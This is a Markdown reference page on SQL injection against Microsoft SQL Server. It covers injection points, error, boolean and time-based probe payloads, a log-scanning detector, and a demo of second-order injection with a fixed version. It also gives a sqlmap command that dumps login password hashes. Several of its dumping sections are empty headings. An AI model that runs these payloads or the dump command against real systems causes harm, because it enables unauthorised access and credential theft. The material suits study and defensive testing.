# MSSQL
Microsoft SQL Server is a relational database management system developed by Microsoft. Microsoft markets a dozen different editions of Microsoft SQL Server with various functionalities and aims. A list of the versions is available at https://support.microsoft.com/en-us/help/321185/how-to-determine-the-version-edition-and-update-level-of-sql-server-an

MSSQL supports stacked queries (several statements separated by `;` in one request).
## Vulnerable parameters detection

### Injection locations
In an HTTP request there are a few possible injection points:

- URL parameters
- POST parameters
- Cookie names and values
- Host header and any custom headers
Note that while the entry points above are the most common, any content in an HTTP request can be prone to SQL injection.
### Injection detection

Detecting vulnerable parameters is most easily done by triggering errors and boolean logic within the application. Supplying malformed input triggers errors, and sending valid queries that embed different boolean conditions may produce different responses from the web server. Time-based payloads can also be used to detect SQL injection in MSSQL.
**Error**: a direct error message can be returned, or the page may behave differently.

```
x='
x=''
x="
x=""
x=\
x=\\
x=\'
...
```

**Boolean testing**: the page can react differently depending on whether the injected condition is true or false.

```
x=1 or 1=1 -- true
x=1' or 1=1 -- true
x=1" or 1=1 -- true
x=1 or 1=2 -- false
...
```

**Time based**: a delay can be induced in the query execution.

```
x=1 WAITFOR DELAY '0:0:5' -- Wait 5 seconds
x=1; WAITFOR DELAY '0:0:5' -- Wait 5 seconds
x=1 WAITFOR TIME '22:42' -- Wait until 22:42
...
```
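The three probe families above leave recognisable traces in web-server logs, which is the defender's side of the same technique. The following is an added example, not code from this page or the cheat sheets it references: it parses a handful of constructed combined-format access-log lines (the IPs, paths and timestamps are made up) and classifies each request as an error, boolean or time-based probe using narrow patterns built from the payload shapes listed above. The log format regex is an assumption about the server's log layout.

```python
from __future__ import annotations

import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (not real traffic). The query strings carry the
# three probe shapes described above: a stray quote that errors, boolean tautologies
# and a WAITFOR DELAY. The last line is a legitimate value containing an apostrophe.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:13:55:36 +0000] "GET /item?id=42 HTTP/1.1" 200 512
203.0.113.5 - - [10/Oct/2023:13:55:37 +0000] "GET /item?id=42' HTTP/1.1" 500 87
203.0.113.5 - - [10/Oct/2023:13:55:38 +0000] "GET /item?id=1+or+1%3D1 HTTP/1.1" 200 9912
203.0.113.5 - - [10/Oct/2023:13:55:39 +0000] "GET /item?id=1+or+1%3D2 HTTP/1.1" 200 0
203.0.113.5 - - [10/Oct/2023:13:55:45 +0000] "GET /item?id=1;+WAITFOR+DELAY+'0:0:5'-- HTTP/1.1" 200 512
198.51.100.7 - - [10/Oct/2023:13:56:01 +0000] "GET /search?q=o'reilly HTTP/1.1" 200 2048
"""

# Combined-log-format line (assumed layout; adapt the regex to your server's logs).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3}) (?P<size>\d+)'
)

# One indicator per technique named in the section. Kept deliberately narrow: they
# match the documented probe shapes, not every possible SQL fragment.
PATTERNS = {
    "boolean": re.compile(r"\b(?:or|and)\s+\d+\s*=\s*\d+", re.I),
    "time": re.compile(r"\bwaitfor\s+(?:delay|time)\b", re.I),
}
ERROR_CHARS = re.compile(r"['\"\\]")


def classify_request(path: str, status: int) -> list[str]:
    """Return the probe techniques the URL-decoded query string of `path` matches."""
    if "?" not in path:
        return []
    query = unquote_plus(path.split("?", 1)[1])
    hits = [name for name, rx in PATTERNS.items() if rx.search(query)]
    # A bare quote or backslash is ambiguous (o'reilly is a real value), so it is only
    # reported as an error probe when the application actually answered with a 5xx.
    if ERROR_CHARS.search(query) and status >= 500:
        hits.append("error")
    return hits


def scan_log(text: str) -> list[dict]:
    """Parse each log line and keep the requests that match at least one technique."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        status = int(m["status"])
        techniques = classify_request(m["path"], status)
        if techniques:
            findings.append({"ip": m["ip"], "time": m["ts"], "path": m["path"],
                             "status": status, "techniques": techniques})
    return findings


def probes_per_ip(findings: list[dict]) -> dict[str, int]:
    """Count flagged requests per source address; a burst from one client is the
    usual signature of a manual or automated parameter-detection run."""
    counts: dict[str, int] = {}
    for f in findings:
        counts[f["ip"]] = counts.get(f["ip"], 0) + 1
    return counts


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["ip"], f["status"], f["techniques"], f["path"])
    print(probes_per_ip(scan_log(SAMPLE_LOG)))
```

The decode step matters: the boolean probes arrive as `1+or+1%3D1`, so matching on the raw path would miss them. The status-code condition on the quote check is the trade-off between catching error probes and not flagging every surname with an apostrophe; a production rule would also look at the response time for the WAITFOR case, which a plain access log does not record.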
### Automated detection

The detection of vulnerable parameters can be automated, using the BurpSuite Pro scanner or sqlmap for example.
Note that second-order SQL injection, which arises when user-supplied data is first stored by the application and later incorporated into SQL queries in an unsafe manner, may not be properly detected by automated tools.
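The second-order case is easiest to see in code. The following is an added example, not code from this page or the referenced cheat sheets: it uses Python's `sqlite3` as a stand-in for MSSQL so it runs offline, and the `users` table, the account names and the e-mail addresses are constructed. The registration path is parameterised and would pass a scanner; the later e-mail update reads the stored name back and concatenates it into a second statement. Even an ordinary name containing an apostrophe breaks that statement, which is the same defect a crafted stored value would abuse. The fixed variant keeps every value a bound parameter at every use.

```python
import sqlite3

# sqlite3 stands in for MSSQL so the example runs offline; the table, accounts and
# e-mail addresses are constructed for the demonstration.


def setup_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT PRIMARY KEY, email TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'admin@example.test')")
    conn.commit()
    return conn


def register(conn: sqlite3.Connection, name: str, email: str) -> None:
    # First use of the input: a parameterised INSERT, so any quote in the name is
    # stored as plain data. A scanner testing this endpoint sees nothing wrong.
    conn.execute("INSERT INTO users (name, email) VALUES (?, ?)", (name, email))
    conn.commit()


def lookup_email(conn: sqlite3.Connection, name: str):
    row = conn.execute("SELECT email FROM users WHERE name = ?", (name,)).fetchone()
    return row[0] if row else None


def update_email_vulnerable(conn: sqlite3.Connection, session_user: str, new_email: str) -> None:
    # Second use: the name is read back from the database and treated as trusted
    # because it "already passed validation". Building the statement by string
    # formatting turns that stored value back into SQL syntax.
    stored = conn.execute("SELECT name FROM users WHERE name = ?", (session_user,)).fetchone()[0]
    sql = "UPDATE users SET email = '%s' WHERE name = '%s'" % (new_email, stored)
    conn.execute(sql)
    conn.commit()


def update_email_fixed(conn: sqlite3.Connection, session_user: str, new_email: str) -> None:
    # Same data flow, but every value stays a bound parameter at every use, so the
    # origin of the value (request or database) no longer matters.
    stored = conn.execute("SELECT name FROM users WHERE name = ?", (session_user,)).fetchone()[0]
    conn.execute("UPDATE users SET email = ? WHERE name = ?", (new_email, stored))
    conn.commit()


def run_demo(update) -> tuple:
    """Register a name containing a quote, then change its e-mail with `update`.
    Returns ("ok", stored_email) or ("error", database_message)."""
    conn = setup_db()
    register(conn, "o'neil", "old@example.test")
    try:
        update(conn, "o'neil", "new@example.test")
    except sqlite3.OperationalError as exc:
        return ("error", str(exc))
    return ("ok", lookup_email(conn, "o'neil"))


if __name__ == "__main__":
    print("vulnerable:", run_demo(update_email_vulnerable))
    print("fixed:     ", run_demo(update_email_fixed))
```

The point for testing is that the injectable statement is never reached by the request a scanner sends; it only runs later, on a different endpoint, with data the scanner stored earlier. For code review, the rule that catches it is simple: the provenance of a value is irrelevant, so every value that reaches a statement is bound as a parameter, whether it came from the request or from the database.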
## Databases dumping

### Comments

### Encoding queries

### Obfuscating queries

### Disable logging mechanisms

### MSSQL version

### Current user

```sql
SELECT (CAST(SYSTEM_USER AS NVARCHAR(4000)))
```

### Users and privileges

### Users' passwords

Using sqlmap:

```
sqlmap -D master -T sys.sql_logins --dump [...]
```

### Databases

### Current database

```sql
SELECT (CAST(DB_NAME() AS NVARCHAR(4000)))
```

### Tables

### Columns

### Data
## References

- https://www.gracefulsecurity.com/sql-injection-cheat-sheet-mssql/
- https://www.asafety.fr/mssql-injection-cheat-sheet
- http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet
- https://www.netsparker.com/blog/web-security/sql-injection-cheat-sheet